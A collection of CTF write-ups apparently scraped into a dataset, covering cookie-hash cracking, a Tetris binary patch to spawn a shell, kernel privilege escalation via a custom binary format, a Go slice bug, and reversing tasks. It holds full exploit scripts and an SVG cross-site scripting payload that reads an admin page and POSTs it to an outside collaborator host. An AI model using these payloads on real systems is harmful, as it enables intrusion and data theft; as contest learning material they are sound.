text_chunk
stringlengths 151
703k
|
|---|
```pythonimport requests
cookies = {"flag": ""}for i in range(0, 100): r = requests.get("http://159.89.166.12:13500/", cookies=cookies) c = r.cookies.get_dict().get("flag") cookies = {"flag": c} print(sols[c]) ```
First of all we must collect as much as cookies as possible. Since all cookies are MD5 hash of 2 chars, they are easy to crack with john/hashcat using a mask
`hashcat -a 3 -m 0 cookie_hashes.txt ?1?1 -1 ?d?l?u?s --increment --increment-min=2`
In the potfile we got only 20 unique cookies: ```"0b1cdc9fe1f929e469c5a54ffe0b2ed5": "s0","6f570c477ab64d17825ef2d2dfcb6fe4": "0o","a8655da06c5080d3f1eb6af7b514e309": "t}","114d6a415b3d04db792ca7c0da0c7a55": "tf","bc54f4d60f1cec0f9a6cb70e13f2127a": "pc","c1d12de20210d8c1b35c367536e1c255": "l0","12eccbdd9b32918131341f38907cbbb5": "re","c758807125330006a4375357104f9a82": "3v","988287f7a1eb966ffc4e19bdbdeec7c3": "ki","ff108b961a844f859bd7c203b7366f8e": "y_","0d4896d431044c92de2840ed53b6fbbd": "3s","440c5c247c708c6e46783e47e3986889": "L_","bc781c76baf5589eef4fb7b9247b89a0": "HE","fcfdc12fb4030a8c8a2e19cf7b075926": "Ea","97a7bf81a216e803adfed8bd013f4b85": "@_","2349277280263dff980b0c8a4a10674b": "@l","f355d719add62ceea8c150e5fbfae819": "_@","96bc320e4d72edda450c7a9abc8a214f": "Um","51de5514f3c808babd19f42217fcba49": "Ut","364641d04574146d9f88001e66b4410f": "_r","639307d281416ad0642faeaae1f098c4": "_y","05cb7dc333ca611d0a8969704e39a9f0": "_t","c716fb29298ad96a3b31757ec9755763": "_b","b2984e12969ad3a3a2a4d334b8fb385a": "{c"```
To get the correct order the flag:
```pythonimport requests
sols = { "0b1cdc9fe1f929e469c5a54ffe0b2ed5": "s0", "6f570c477ab64d17825ef2d2dfcb6fe4": "0o", "a8655da06c5080d3f1eb6af7b514e309": "t}", "114d6a415b3d04db792ca7c0da0c7a55": "tf", "bc54f4d60f1cec0f9a6cb70e13f2127a": "pc", "c1d12de20210d8c1b35c367536e1c255": "l0", "12eccbdd9b32918131341f38907cbbb5": "re", "c758807125330006a4375357104f9a82": "3v", "988287f7a1eb966ffc4e19bdbdeec7c3": "ki", "ff108b961a844f859bd7c203b7366f8e": "y_", "0d4896d431044c92de2840ed53b6fbbd": "3s", "440c5c247c708c6e46783e47e3986889": "L_", "bc781c76baf5589eef4fb7b9247b89a0": "HE", "fcfdc12fb4030a8c8a2e19cf7b075926": "Ea", "97a7bf81a216e803adfed8bd013f4b85": "@_", "2349277280263dff980b0c8a4a10674b": "@l", "f355d719add62ceea8c150e5fbfae819": "_@", "96bc320e4d72edda450c7a9abc8a214f": "Um", "51de5514f3c808babd19f42217fcba49": "Ut", "364641d04574146d9f88001e66b4410f": "_r", "639307d281416ad0642faeaae1f098c4": "_y", "05cb7dc333ca611d0a8969704e39a9f0": "_t", "c716fb29298ad96a3b31757ec9755763": "_b", "b2984e12969ad3a3a2a4d334b8fb385a": "{c",}
cookies = {"flag": ""}for i in range(0, 100): r = requests.get("http://159.89.166.12:13500/", cookies=cookies) c = r.cookies.get_dict().get("flag") cookies = {"flag": c} print(sols[c])```
Flag: `pctf{c0oki3s_@re_yUm_bUt_tHEy_@ls0_r3vEaL_@_l0t}` |
# *Client Side is Still Bad*
## Information| Points |Category | Level||--|--|--|| 150 | Web Exploitation |Easy |
## Challenge> I forgot my password again, but this time there doesn't seem to be a reset, can you help me? `http://2018shell.picoctf.com:8930` ([link](http://2018shell.picoctf.com:8930))### Hint
> Client Side really is a bad way to do it.## Solution
Let's open the link we got, looks like a normal site with a normal login form.So let's dig in it, right click and choose view source page (Ctrl + U).
We are looking for something that connect to the login...We can see a java-script that has function called "verify", and the script get variablefrom an element in the page with the id "pass", so it's probably the text box we can see in the page. the function split the text for each 4 chars and check if each sub-string is correct. Let's connect the sub-strings and see what we can find> picoCTF{client_is_bad_d0ebbd}
it's the same form as our flag, enter it in the login form and we can see a popup message that say:
you got the flag!
## Flag> `picoCTF{client_is_bad_d0ebbd}`
|
Change final activation to linear to get useful gradients
Full script/writeup: https://ctf.harrisongreen.me/2019/confidence-ctf-2019-teaser/neuralflag/ |
# BSidesSF 2019 CTF
## genius
## Information
**Category:** | **Points:** | **Writeup Authors**--- | --- | ---PWN | 500 | [a1exdandy](https://twitter.com/a1exdandy) and [merrychap](https://github.com/merrychap)
**Description:**
>Using your 80s gamer skills, and maybe some help from a Genius friend, can you read /home/ctf/flag.txt?
`nc genius-0a835449.challenges.bsidessf.net 1338`
**Files:**
[loader](./loader)
[genius](./genius)
## Solution
So, basically, we are given with two binaries: `loader` and `genius`. Let's start with the reversing each file and trying to understand what they are supposed to do
### Reversing `loader`
#### main function
It's a really tiny binary and it does the following:
1. Reads `genius` binary into the stack char array (as a binary data).
2. Asks Game Genius code for the first time.
3. Asks Game Genius code for the second time.
4. Puts `genius_binary` into a tmp file and executes it
Now let's talk about each statement above. I suppose the first statement is clear -- the `genius` binary is just loaded into the stack memory of `loader` executable in runtime. The more interesting part here is patch applying. Before diving into `apply_patch` function we need to understand that `apply_patch` takes `code` we enter, `offsetX` and `byteX` as parameters. After calling for `apply_patch` `genius_binary` is changed: `genius_binary[offsetX] = byteX`. Looks like we input some code that is converted further into an offset and some byte. It means that we can change any two bytes of the `genius` binary. Sounds cool!
#### apply_patch function
Now we have enough information to understand `apply_patch` function.
As you can see, entered `code` is divided into bytes and these bytes are converted using `convert` function. Before talking about applying patch itself, let's explore `convert` function in the first place.
Just `byte <-> byte` matching. But look at the resulting bytes more closely. They are basically all permutations of 4 bits:
```00000001001000110100...1111```
Interesting, but let's back to `apply_patch` function. `offset` and `byte` are calculated using converted bytes. More accurately, it uses some bits of each converted byte to calculate `offset` (2 bytes size) and `byte` (1 byte size). Now, we just need to understand how bits are placed. After spending some time we've got the next:
- First line : global bit index
- Second line : converted byte number (you saw them in the picture somewhere above)
- Third line : local bit index. If you remember, all our converted bytes are between `0b000` and `0b1111`, so different bits are used in different places.
Offset:```|15|14|13|12|11|10| 9| 8| 7| 6| 5| 4| 3| 2| 1| 0|| 0|b4|b4|b4|b5|b6|b6|b6|b2|b3|b3|b3|b4|b5|b5|b5|| | 2| 1| 0| 3| 2| 1| 0| 3| 2| 1| 0| 3| 2| 1| 0|```
Byte```| 7| 6| 5| 4| 3| 2| 1| 0||b1|b2|b2|b2|b6|b1|b1|b1|| 3| 2| 1| 0| 3| 2| 1| 0|```
Now we're able to write a script that will be generate `code` based on specified `offset` and `byte`:
```pythonmagic_dict = { 0b0000: 'A', 0b1000: 'E', 0b0100: 'G', 0b0101: 'I', 0b1100: 'K', 0b0011: 'L', 0b1111: 'N', 0b1001: 'O', 0b0001: 'P', 0b1101: 'S', 0b0110: 'T', 0b1011: 'U', 0b1110: 'V', 0b1010: 'X', 0b0111: 'Y', 0b0010: 'Z'}
def gen_input(addr, val): b1 = (val & 0b111) | ((val & 0b10000000) >> 4) b2 = ((val & 0b1110000) >> 4) | ((addr & 0b10000000) >> 4) b3 = ((addr & 0b1110000) >> 4) b4 = ((addr & 0b111000000000000) >> 12) | ((addr & 0b1000)) b5 = ((addr & 0b100000000000) >> 8) | (addr & 0b111) b6 = ((addr & 0b11100000000) >> 8) | ((val & 0b1000))
return magic_dict[b1] + \ magic_dict[b2] + \ magic_dict[b3] + \ magic_dict[b4] + \ magic_dict[b5] + \ magic_dict[b6]
# it will generate an input that will be converted# into offset=0x1122 and byte=0x41gen_input(0x1122, 0x41)```
Alright, we're done with `loader` now. As we understood, `loader` allows us to change two arbitrary bytes of `genius` binary. Now we can proceed to look at the `genius` binary
### Reversing `genius`
You can reverse the binary by your own :D We will only discuss the most important parts for solving the task.
Basically, `genius` is a Tetris game. We have spent some time reversing it and haven't found any bugs in the game itself. The most important part here is that the game map is stored using set and unset bits. It means that each game map point is an object of the bit array.
### Exploiting the game
As long as the game doesn't have any visible bugs, we need to create them! If we look at the code of `main` function more closely, we can notice that at the end of the function `memset` is called:
This is potentially can be used to create a vulnerable code. Let's imagine we change `memset` to `system`, then everything we need to do after this is to create `sh;` string somewhere inside of `game_buf` (which is the game map actually).
We can change `memset` to `system` by changing only one byte : `0xcb -> 0x8b` in the function call. Cool, now we have the last one byte to use. Where it can be used? Well, we need to create `sh;` string at the beginning of the `game_buf` to pop up a shell. But this is not very convenient, it's hard to control beginning of the game map. Instead, we can change offset to the pushed address for `memset` in order to shift the beginning of `game_buf` somewhere further which will be nice.
Alright, here is an example of `sh;` string in the game buffer:
Generally speaking, we need to do three things:
1. Change `memset` to `system` by changing `0xcb` to `0x8b` at `0x1551` offset of the `genius` binary beginning
2. Change the beginning of `game_buf` for `system`. `0xa0 -> 0xab` at `0x154c` offset of the beginning.
3. Construct `sh;` as shown in the picture above.
The final call to `memset (system)` will be like that:
If we do everything correctly, then we get the shell:
The last thing we need to do is to play the game in such way that `sh;` is constructed as in the picture. Well, it was a pain, so let's just skip this part :D
### The final exploit
So here are [the final exploit](./exploit.py)
```pythonimport time
from pwn import *
magic_dict = { 0b0000: 'A', 0b1000: 'E', 0b0100: 'G', 0b0101: 'I', 0b1100: 'K', 0b0011: 'L', 0b1111: 'N', 0b1001: 'O', 0b0001: 'P', 0b1101: 'S', 0b0110: 'T', 0b1011: 'U', 0b1110: 'V', 0b1010: 'X', 0b0111: 'Y', 0b0010: 'Z'}
def gen_input(addr, val): b1 = (val & 0b111) | ((val & 0b10000000) >> 4) b2 = ((val & 0b1110000) >> 4) | ((addr & 0b10000000) >> 4) b3 = ((addr & 0b1110000) >> 4) b4 = ((addr & 0b111000000000000) >> 12) | ((addr & 0b1000)) b5 = ((addr & 0b100000000000) >> 8) | (addr & 0b111) b6 = ((addr & 0b11100000000) >> 8) | ((val & 0b1000))
return magic_dict[b1] + \ magic_dict[b2] + \ magic_dict[b3] + \ magic_dict[b4] + \ magic_dict[b5] + \ magic_dict[b6]
REMOTE = False
def main(): if REMOTE: pc = remote('genius-0a835449.challenges.bsidessf.net', 1338) pc.sendlineafter('continue!\n', gen_input(0x154c, 0xab)) pc.sendlineafter('<enter>', gen_input(0x1551, 0x8b)) else: pc = process('./loader') pc.sendlineafter('continue!\n', gen_input(0x154c, 0xab)) pc.sendlineafter('<enter>', gen_input(0x1551, 0x8b))
pc.recvuntil('+----------+') pc.recvuntil('+----------+') ## ## pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ## # pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('e') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
## ## pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+') # ## # pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ## # pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('q') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
## ## pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ## # pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('e') pc.sendline('a') pc.sendline('a') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('e') pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+') # ### pc.sendline('q') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ## # pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('q') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
#### pc.sendline('q') pc.sendline('d') pc.sendline('d') # pc.sendline('s')
for i in range(13): pc.recvuntil('+----------+') pc.recvuntil('+----------+') pc.sendline('d') pc.sendline('s')
pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ## # pc.sendline('d') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
## ## pc.sendline('a') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('q') pc.sendline('q') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ## # pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
#### pc.sendline('q') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('e') pc.sendline('e') pc.sendline('a') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('e') pc.sendline('d') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('q') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('a') pc.sendline('a') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
# ### pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('a') pc.sendline('q') pc.sendline('a') pc.sendline('a') for i in range(8): pc.recvuntil('+----------+') pc.recvuntil('+----------+') pc.sendline('d') pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
pc.sendline('s') pc.recvuntil('+----------+') pc.recvuntil('+----------+')
pc.interactive()
if __name__ == '__main__': main()```
### Little note
We haven't solved it while the ctf was running, because of merrychap's fuckup :D Instead of
```pythonpc.recvuntil('+----------+')pc.recvuntil('+----------+')```
he used `sleep(1)` and it was a huge mistake. a1exdandy fixed it some time after the end of the ctf and we have got the flag:
> Flag: CTF{game_genie_killed_the_nintendo_star}
It was a nice chall and we enjoyed it a lot :) |
tl;dr No check is done before the call to `_clear_user` to ensure that the address that is being passed is a userspace address. So we can overwrite arbitrary kernel address with null's. Also there is no bounds check being done while looking up the address to `vm_mmap` which allows us to leak the address of the creds structure. |
Full writeup at [https://devcraft.io/2019/03/19/p4fmt-confidence-ctf-2019-teaser.html](https://devcraft.io/2019/03/19/p4fmt-confidence-ctf-2019-teaser.html)
P4 format is something like: ```cenum p4_type { SIMPLE=0, ADVANCED=1};
struct p4_mapping { long load_addr; long length; long offset;};
struct p4_bin { char magic[2]; char version; enum p4_type type; int mapping_count; long offset;};```Exploit:* leak creds address using a mapping count of 6* create a mapping to overwrite the cred ids with 0 using __clear_user
```pythonfrom pwn import *
context.arch = "amd64"context.os = "linux"
code = asm(shellcraft.cat("/flag") + shellcraft.exit())
creds = 0xffff93a1875f80c0 # leaked creds structpayload = ""payload += "P4" # magicpayload += p8(0) # versionpayload += p8(1) # type
payload += p32(3) # countpayload += p64(0x10) # offset
payload += p64(0x400058) # entrypayload += p64(0)payload += p64(0)
payload += p64(0x400000 | 7) # protpayload += p64(0x1000)payload += p64(0)
payload += p64((creds + 0x10) | 8) # clearpayload += p64(0x20)payload += p64(0)
payload += code
print "rm b; printf '" + payload.encode("string_escape") + "'>b;chmod +x ./b; ./b"``` |
```pythonimport refuncs = []for x in idautils.Functions(): fn = get_func_name(x) if fn.find('function') != -1: de = int(str(idaapi.decompile(x)).find('^')!=-1) funcs.append([fn, x, de]) checkFlag_addr = 0xCEB7Cde = str(idaapi.decompile(checkFlag_addr)).split('function')[1:]
flag = [0]*1000
for code in de: idx = re.search('a1 \+ ([0-9]+)', code) idx = 0 if not idx else int(idx.group(1)) bit = re.search('>> ([0-9]+)', code) bit = 0 if not bit else int(bit.group(1))
flag[idx] += funcs[ int(code.split('(')[0]) ][2] << bit
flag=list(filter(lambda a: a != 0, flag))print('flag => ' + ''.join(list(map(chr, flag))))
``` |
# The Lottery
The **last solved** challenge at 'Teaser CONFidence CTF 2019'.
## Logic
The challenge is a REST API written in Go. It has a functionality of choosinga lottery winner along with the accounts *management*.
### Package `app`
Account:```gotype Account struct { Name string `json:"name"` Amounts []int `json:"amounts"`}```
Basically, we may do two things with the account: - `Account.AddAmount(50)` adds provided amount (must be wihtin `0-99`), also total number of amounts must be less than 5, - `Service.LotteryAdd(account)` signs user up to the lottery.
You have two options to get a flag - your account must: 1. Be a millionaire (sum of amounts > 1,000,000), 2. Be a lottery's winner.
### Package `transport`
There is implementation of HTTP handlers and routing. All we need to know is:flag is served with the account of millionaire or lottery winner.
## Vulnerabilities
Let's take a look how exactly `lottery` works.
When we invoke `Service.LotteryAdd` method it passes the copy of `account`object to lottery. It means we have the same object (literally bytes) in twoplaces: `lottery` (copy) and `service` (original).
The next step: `lottery.evaluate` loops over previously copied accounts and does:```goamounts := append(account.Amounts, randInt(999913, 3700000))```
Pretty cool. It adds a really big number (~1m) to `account.Amounts`. If only itcould be saved at the 'original' account too...
Then it checks if total sum of amounts and our random number is equal to`1259264`.
### Solution 1 (brute force)
Regardless of added amounts to account, we have only one value that wins thelottery (in range `999913-3700000`).
```python>>> 3700000 - 9999132700087```
Theoretically, to get a flag you may just create accounts and after`LOTTERY_PERIOD` duration check if this user is a lottery winner.
For each try we must do three HTTP requests: 1. Create an account, 2. Add account to lottery, 3. After `LOTTERY_PERIOD` duration check if the account is a winner.
Let's do a quick math:```python>>> 2700087*3 # total number of requests8100261>>> 8100261 / 2500 # divide by 2500 rps (are you capable of doing more?)3240.1044>>> 3240.1044 / 3600 # how many hours? 0.90```
As you can see, with a high confidence it was possible to get a flag within one hour!It wasn't intended solution, but probably some teams managed to use it.Congratulations though.
### Solution 2 (go slices)
Let's go back to previously noticed amounts `append` with a big number.So, how exactly does it work?
We append an `Account`'s attribute which is a `[]int` slice. ```gotype Account struct { Amounts []int // This is a []int slice.}```However, what's a slice? (Worth reading: https://blog.golang.org/go-slices-usage-and-internals)
Definition of slice:> A slice is a descriptor of an array segment. It consists of a pointer to the> array, the length of the segment, and its capacity (the maximum length of> the segment).
In fact, a slice is a pointer to the memory and not the memory itself! It meanswe are able to write to the *original* `amounts` memory while the lottery evaluation.However, slice is kind of like the `vector` in C++. If you will append theelement over the available capacity, it will reallocate itself to the anotherbigger memory chunk. Therefore we must ensure, reallocation won't happen.
Our strategy is creating two slices which point to the same memory. We copy`Account` struct when adding to the `Lottery`, so the slice will be alsocopied. When it comes to the capacity - we need to have such length andcapacity that `append` won't reallocate the slice (and just write to thememory). `MaxAmountsLen = 4`, so we may exploit it by `capacity=4` and`length=3`. In this case adding another item will just overwrite fourth element.
Anyway, here is the code:```gofunc HackLottery() { // Create new service. s := NewService(context.Background(), time.Millisecond, time.Minute)
// Add new account. a, _ := s.AccountAdd()
// Add '90' amount three times. s.AccountAddAmount(a.Name, 90) s.AccountAddAmount(a.Name, 90) s.AccountAddAmount(a.Name, 90)
// Right now we have a slice with three values [90, 90, 90] // Do you know what's the capacity and length of it? // Length=3, Capacity=4. // It means that after the next 'append' we won't reallocate to the new memory.
// We would like to extend our original slice to length=4 and then wait for // the lottery's append to overwrite the last item.
// Add account to the 'Lottery'. s.LotteryAdd(a.Name) // Immediately after extend 'amounts' slice. s.AccountAddAmount(a.Name, 90)
// 'Lottery.evaluate' should overwrite the last element in the original amounts. s.lottery.evaluate()
// Does it work? a, _, _ = s.AccountGet(a.Name) fmt.Printf("%v\n", a.Amounts) // [90 90 90 1723342] // Yay, you are a millionaire.}```
Do you know why it doesn't work for slices with capacity less than 4?
## Flag
```sh$ python hack.py p4{fucking-go-slices.com}```
## Survey
Accordingly to the poll, 'The Lottery' was the second coolest challenge!Thank you.
https://github.com/p4-team/ctf/tree/writeup/2019-03-17-confidence2019 |
Since there doesn't seem to be any community writeups on this one:
1. The expected solution is this bug https://bugs.openjdk.java.net/browse/JDK-4523159 it's not much of a 0day (since it's from 2001) but it has never been solved. - jar resource loader assumes that `!` denotes the boundary of the jar - if the jar is inside a path with `!` loading resources will fail - solution: provide username ending with `!`, and the password will be `default`2. There was another, unintended solution, attacking the runner script. It was possible to trigger a race condition between launching the jar and cleanup function - connect to the service and solve PoW - wait almost 10s - right before cleanup is called from sigalarm, provide any username - if you're lucky, the jar will start, but before the resources are loaded, cleanup will remove the jar, causing the resource load to fail - if you manage to trigger this, and still send password and receive response, before the connection is broken, you will actually receive the flag
We know that there were teams who managed to trigger this race condition! :) |
Teaser CONFidence CTF 2019: Web 50==================================
Challenge description:
idk what this site does, but you can put some secret, shoe size and report it to the admin...
We are given a URL. When we visit it we find the following screen:
From the source code, it seems to be user and password. Let's try some random values, like `fabada`/`fabada123` and submit the form.
Apparently we're in:
Let's check the _Profile_ section:
Here we can define some values that will be sent to the server with a POST to `/profile/fabada`. We try clearing cookies and logging in again, and we find that the values are kept. Therefore, we effectively created an account at the platform, and our profile can be found at `/profile/<USERNAME>`. Interestingly enough, we can upload a file as the avatar, but they are controlling that the file is actually an image. We'll keep an eye out for that...
Let's now check the _Report_ section:
We found that in this screen we can submit a URL belonging to this domain. Actually not every single one, but i.e. profiles are allowed. We try sending our own profile and we get the following response:
Mmh do we now what that means? Starts sounding like a client-side attack... This probably means that we can make the admin visit our own profile. Talking about `admin`, let's try and see if he has his own profile:
Yes he does! But we don't get the option to edit any field as with our own profile (obviously). We try checking our own profile with a different account, and we confirm that that's how profiles for other users are displayed.
Let's now look for the client-side attack. Back to our own profile, we try several XSS payloads in the different fields. In the end, found an attack vector by uploading an SVG with embedded Javascript (size needs to be 100x100, as pointed out by the returned error if we try other sizes, so we directly grabbed one from Google Images):
``` <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" width="100px" height="100px" viewBox="-12.5 -12.5 100 100" xml:space="preserve"> ... <g> <polygon fill="#00B0D9" points="41.5,40 38.7,39.2 38.7,47.1 41.5,47.1 "></polygon> <script type="text/javascript"> alert('XSS!'); </script> </g> ...</svg>
```
After uploading the image, the profile is shown and nothing happens:
Visiting the image's URL, however...
Nice! Hopefully we can submit this for the admin to check out? Yes we can. The full generated URL is something of the sort:
`http://web50.zajebistyc.tf/avatar/82b956e443066b3179e9493507c12344a87585d36d3aa92ae02710b1f1d1da5f/fabada_avatar.svg`
How can we leverage this to compromise the admin? We tried two failed approaches:
1. Send ourselves some `document.cookies` from the admin? Nope, the session cookie is `HttpOnly`.2. Within the XSS payload, trigger an authenticated POST request to `/profile/admin` modifying the `secret` parameter. We believed that was the password, and therefore we could take over the admin account. We then found out that was not the case... Maybe `secret` is the flag itself for the `admin` user!
We then realized that maybe we could trigger a GET request to `/profile/admin` from the admin's browser obtaining the profile's "full version" including the secret. We could then redirect the response to this request to our own server (in this case, we used Burp Collaborator).
The payload:
``` <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" width="100px" height="100px" viewBox="-12.5 -12.5 100 100" xml:space="preserve"> ... <g> <polygon fill="#00B0D9" points="41.5,40 38.7,39.2 38.7,47.1 41.5,47.1 "></polygon> <script type="text/javascript"> var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState === 4) { var xhr2 = new XMLHttpRequest(); xhr2.open("POST", "http://XXXX.burpcollaborator.net/"); xhr2.send(xhr.responseText); } } xhr.open("GET", "http://web50.zajebistyc.tf/profile/admin"); xhr.withCredentials = true; xhr.send(); </script> </g> ...</svg>
```
After reporting the URL for our brand new uploaded malicious SVG, a request was received by the Collaborator which included the flag!
|
# OldschoolSee original writeup and challenge files [here](https://github.com/xrmon/ctf-writeups/tree/master/2019/confidence-ctf)
For this challenge we were given an MSDOS executable, oldschool.exe, and a text file flag.txt containing a weird jumble of characters in UTF-16. We use dos2unix to convert it into unix-friendly UTF-8, with ‘\n’-style newlines:```$ dos2unix flag.txtdos2unix: converting file flag.txt to Unix format ...$ cat flag.txt 4 {4pp p {k4{ E p 44p{ p 4 p S
$```
Opening up the file with radare, we notice some interesting quirks about how DOS works. Instead of calling library functions (puts, printf…), the program makes calls to the DOS API by setting registers accordingly and using the **int 0x21** instruction. We can read about the DOS API here: http://spike.scu.edu.au/~barry/interrupts.html
The first API interrupt in the file sets AH to 9, indicating “write string to stdout”. This prints the string in DX, which is “Give me a flag to draw!” - so the weird arty text file above must be the output of this program with the flag! Interestingly, strings in DOS are ‘$’-terminated instead of NULL terminated like we would normally expect.
As we can see, there are three main functions called from this program. The first looks a horrific mess of basic blocks, which continues for several pages of scrolling through Radare’s graph view (accessible when in a function by typing VV). The second is a simple for loop an array of size 0xA2, which was presumably produced from the horrific first function. There is a fake flag, “ p4{krule_ctf}” stored at address 0xBC.
For each byte in the array, it uses the byte’s value as a position in the fake flag to produce a single character, which we store back in the array - this must be how the flag’s drawing was produced! If the value in the array is greater than the length of the fake flag, we simply write a ‘^’ character. We don’t see this in flag.txt, so we know this didn’t happen.
The third and final function is fairly boring, it simply adds newlines every 18 characters, giving 9 lines of output (0xA2 / 18 = 9). The only slightly interesting thing here was that since the program exits by a call to the DOS API, there is no ret instruction in the entry function, meaning radare tried to analyse this third function as part of the entry function (since it was the next thing in memory). I decided not to waste time figuring out the commands to manually fix it, since I knew what the function did anyway.
The first function was by far the most time consuming part of the challenge. The first section was relatively easy to reverse: it takes a byte of hex as input and converts it to an integer. Then, there is a for loop with four iterations: It does a thing with the lowest bit of the input byte, then does a thing with the second lowest bit, then finally it bit shifts right by two so that the next iteration operates on the next bits. The operation looks something like:```hex = input()byte = int(hex)for i in range(0, 4): do_thing_with_first_bit(byte) do_thing_with_second_bit(byte) byte = byte >> 2```
This entire operation is wrapped in yet another for loop, this time with 9 iterations. So, overall, the user gives 9 bytes of input to the program. We now know that the flag is 9 bytes long! Upon closer inspection and after a few hours of reversing, we discovered the purpose of the two functions which operate on each bit of the input. Remember that array of size 0xA2 that we process in the second and third functions? Well, turns out we keep track of a position in that array, and move that position on each iteration of the inner for loop. After each iteration, we increment our position by 1, producing the array of lowish values which eventually gets printed out in an artsy fashion.
The two functions which operate on the first and second bit for each iteration actually just move the position left or right, and up or down in the array. The logic looks complicated and scary because the program checks if we would go off the edge of the array, and stays put if so. But with that caveat it’s a relatively simple function. In pythonic pseudocode, the overall logic now looks like:```pox = 0x50for i in range(0, 9): hex = input() byte = int(hex) for j in range(0, 4): pos = first_thing(byte, pos) pos = second_thing(byte, pos) byte = byte >> 2 array[pos] += 1```
Where the functions first_thing and second_thing move the position left, right, up and down as such:```def first_thing(byte, pos): bit = first_bit(byte) if bit == 1 and not at edge of array: # Move right pos += 1 elif bit == 0 and not at edge of array: # Move left pos -= 1 else: # Keep position the same return pos
def second_thing(byte, pos): bit = second_bit(byte) if bit == 1 and not at edge of array: # Move down (each row is length 18) pos += 18 elif bit == 0 and not at edge of array: # Move up (each row is length 18) pos -= 18 else: # Keep position the same return pos```
In addition, we are given the starting position 0x50, hardcoded into the binary and marked with an ’S’ into the program output. The final position is also given, marked with an ‘E’. We now have the task of finding a path through the grid from S to E, which increments each position in the array the correct number of times. There’s probably a clever algorithm for doing stuff like this, but for smallish problems like this I like to sit down and have a go by hand since it’s often quicker than finding and developing the algorithm for it.
A while later sat drawing and redrawing solutions on a whiteboard, I came up with a solution which worked:
Writing out this solution in terms of bits, converting to hex and remembering to reverse the bits in each byte so they are processed in the right order, this gave us the following solution:057a1697667316327d
After adding the ‘p4{‘ and ‘}’ required by the flag format, I submitted this to the scoring system, and… was greeted by a “wrong flag” message.
At this point I downloaded dosbox from dosbox.com and emulated the program with my input, and sure enough, it printed exactly the same output that we were given. After verifying this I contacted an admin on IRC who was very friendly and gave me a hint towards finding the solution: I had ignored the ‘p4{‘ & ‘}’ strings from my answer since they were not valid hex characters and would be rejected by the program. However, these are a necessary part of the solution. It turns out the program actually takes the hex encoding of the flag, meaning the program input is something like 70347b??????????7d (since we know the flag starts with ‘p4{‘ and ends with ‘}’).
This actually makes the problem significantly easier, since we are given part of the route already and must simply find the rest of it (remember, each pair of bits in the solution gives us a move left/right, and a move up/down, meaning every move is diagonal unless we are at the edge of the array). With the new fixed parts of the route that we have discovered marked in red, and arrows I added marked in green, this now gives us:
Converted to hex, we now get, 70347b61716932667d, which when decoded gives us p4{aqi2f}, which is the actual flag for the challenge. |
# -.-
We're given a text file with a bunch of dih-s, dah-s, and di-s. Looks like Morse Code. Let's download the file so we can work with it from our terminal.
```$ wget https://tamuctf.com/files/cd5fef538fad2500c30c4ea389c50244/flag.txt```
